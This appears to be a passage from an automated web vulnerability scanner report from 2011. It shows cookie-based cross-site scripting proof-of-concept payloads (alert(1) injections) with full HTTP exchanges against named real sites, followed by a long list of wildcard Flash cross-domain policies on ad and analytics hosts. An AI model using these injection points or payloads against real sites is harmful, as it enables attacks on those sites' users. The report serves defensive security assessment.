User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/
Cookie: IP=173%2E193%2E214%2E243aea69"%3balert(1)//e28fc1d79f2

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Jul 2011 19:18:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7296
Content-Type: application/x-javascript
Expires: Mon, 18 Jul 2011 19:28:04 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServerName;
       SiteMeter.SecurityCode = sSecurityCode;
       SiteMeter.IP = "173.193.214.243aea69";alert(1)//e28fc1d79f2";
       SiteMeter.trackingImage = new Image();
       SiteMeter.dgOutlinkImage = new Image();

       if (typeof(g_sLastCodeName) != 'undefined')
           if (g_sLastCodeName == sCodeName)
               return;

       SiteMete
...[SNIP]...

3.181. http://support.dnsstuff.com/ST.ashx [siteuidut cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.dnsstuff.com
Path:   /ST.ashx

Issue detail

The value of the siteuidut cookie is copied into the HTML document as plain text between tags. The payload bef9e<script>alert(1)</script>cd0826810c8 was submitted in the siteuidut cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ST.ashx?scriptonly=true HTTP/1.1
Host: support.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://support.dnsstuff.com/Main/Default.aspx
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.7.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; guid=629fad8433489d10f91fe22b85337a2c; ID=f3d6c1ad003861; ASP.NET_SessionId=54ocirjmvwc4xy45do1kfw55; siteuidut=3f03185aa4854245bf4232ef4c0a1a49bef9e<script>alert(1)</script>cd0826810c8

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:26:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 37861

this.STVisitorValue = "3f03185aa4854245bf4232ef4c0a1a49bef9e<script>alert(1)</script>cd0826810c8";
this.STCallbackInterval = 8000;
this.STHandlerFile = "ST.ashx";
this.STLastCallbackImageHeight = 0;
this.STLastCallbackAction = 0;
this.STTimeoutID = 0;
this.STPortalURL = "";
this.STImgHeigh
...[SNIP]...

4. Flash cross-domain policy
There are 73 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://a.tribalfusion.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.2. http://ad.afy11.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 18 Jul 2011 19:15:26 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.3. http://ad.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Mon, 18 Jul 2011 19:18:18 GMT
Content-Type: text/xml;charset=UTF-8
Date: Mon, 18 Jul 2011 19:18:18 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

4.4. http://ajax.googleapis.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Tue, 19 Jul 2011 01:43:19 GMT
Date: Mon, 18 Jul 2011 01:43:19 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 1955

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

4.5. http://amch.questionmarket.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: amch.questionmarket.com

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:13:53 GMT
Server: Apache/2.2.3
Last-Modified: Tue, 28 Mar 2006 15:45:05 GMT
ETag: "e0686c83-d1-4100ff999c240"
Accept-Ranges: bytes
Content-Length: 209
Keep-Alive: timeout=5, max=820
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>


<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
    <allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

4.6. http://api.facebook.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Wed, 17 Aug 2011 19:10:23 GMT
X-FB-Server: 10.27.254.130
Connection: close
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

4.7. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT
Content-Type: application/xml
Expires: Tue, 19 Jul 2011 16:58:54 GMT
Date: Mon, 18 Jul 2011 16:58:54 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

4.8. http://b.voicefive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT
Content-Type: application/xml
Expires: Tue, 19 Jul 2011 19:12:25 GMT
Date: Mon, 18 Jul 2011 19:12:25 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

4.9. http://bbc.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bbc.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bbc.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 16:58:56 GMT
Server: Omniture DC/2.0.0
xserver: www424
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.10. http://beacon.afy11.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://beacon.afy11.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: beacon.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 18 Jul 2011 19:13:56 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.11. http://bh.contextweb.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
ETag: W/"384-1279205345000"
Last-Modified: Thu, 15 Jul 2010 14:49:05 GMT
Content-Type: application/xml
Content-Length: 384
Date: Mon, 18 Jul 2011 19:14:44 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.contxtweb.com -->
<cross-domain-policy>
<site-contro
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.12. http://c.atdmt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 18:44:56 GMT
Accept-Ranges: bytes
ETag: "044698a197dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Mon, 18 Jul 2011 18:11:25 GMT
Connection: keep-alive
Content-Length: 109

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.13. http://c.betrad.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.betrad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "623d3896f3768c2bad5e01980f958d0a:1298927864"
Last-Modified: Mon, 28 Feb 2011 21:17:44 GMT
Accept-Ranges: bytes
Content-Length: 204
Content-Type: application/xml
Date: Mon, 18 Jul 2011 19:18:05 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.14. http://c.live.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.live.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.live.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 19:44:56 GMT
Accept-Ranges: bytes
ETag: "0ac2dec217dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Mon, 18 Jul 2011 18:11:22 GMT
Connection: keep-alive
Content-Length: 109

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.15. http://cdn.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Mon, 18 Jul 2011 19:13:39 GMT
Date: Mon, 18 Jul 2011 19:13:39 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

4.16. http://cdn5.tribalfusion.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn5.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn5.tribalfusion.com

Response

HTTP/1.0 200 OK
P3p: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
Content-Length: 102
X-Reuse-Index: 101
Content-Type: text/xml
Date: Mon, 18 Jul 2011 19:10:19 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.17. http://citicorporate.d2.sc.omtrdc.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://citicorporate.d2.sc.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: citicorporate.d2.sc.omtrdc.net

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 14:28:18 GMT
Server: Omniture DC/2.0.0
xserver: www1
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.18. http://cms.quantserve.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cms.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cms.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 19 Jul 2011 19:18:22 GMT
Content-Type: text/xml
Content-Length: 207
Date: Mon, 18 Jul 2011 19:18:22 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

4.19. http://dg.specificclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://dg.specificclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dg.specificclick.net

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
Content-Length: 194
Date: Mon, 18 Jul 2011 19:16:18 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

4.20. http://external.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: external.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "a27e344a618640558cd334164e432db0:1247617934"
Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Mon, 18 Jul 2011 19:10:39 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.21. http://feed.domaintoolsblog.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.domaintoolsblog.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: feed.domaintoolsblog.com

Response

HTTP/1.0 200 OK
Expires: Tue, 19 Jul 2011 02:16:15 GMT
Date: Mon, 18 Jul 2011 02:16:15 GMT
Cache-Control: public, max-age=86400
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.22. http://fw.adsafeprotected.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fw.adsafeprotected.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"202-1308159838000"
Last-Modified: Wed, 15 Jun 2011 17:43:58 GMT
Content-Type: application/xml
Content-Length: 202
Date: Mon, 18 Jul 2011 19:10:30 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

4.23. http://g.live.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://g.live.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: g.live.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 09 Oct 2008 18:52:49 GMT
Accept-Ranges: bytes
ETag: "fee1eb39402ac91:0"
Server: Microsoft-IIS/7.5
Date: Mon, 18 Jul 2011 18:11:34 GMT
Connection: keep-alive
Content-Length: 104

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.24. http://hits.informer.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.informer.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: hits.informer.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 14:37:09 GMT
Content-Type: text/xml
Connection: close
Content-Length: 266
Last-Modified: Tue, 10 Nov 2009 10:24:28 GMT
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
   <allow-http-reque
...[SNIP]...

4.25. http://i1.ytimg.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://i1.ytimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: i1.ytimg.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 27 Aug 2010 02:31:32 GMT
Date: Wed, 13 Jul 2011 22:53:01 GMT
Expires: Wed, 20 Jul 2011 22:53:01 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=604800
Age: 418653

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.26. http://ib.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 19-Jul-2011 16:59:07 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3130735210495784896; path=/; expires=Sun, 16-Oct-2011 16:59:07 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

4.27. http://in.getclicky.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://in.getclicky.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
<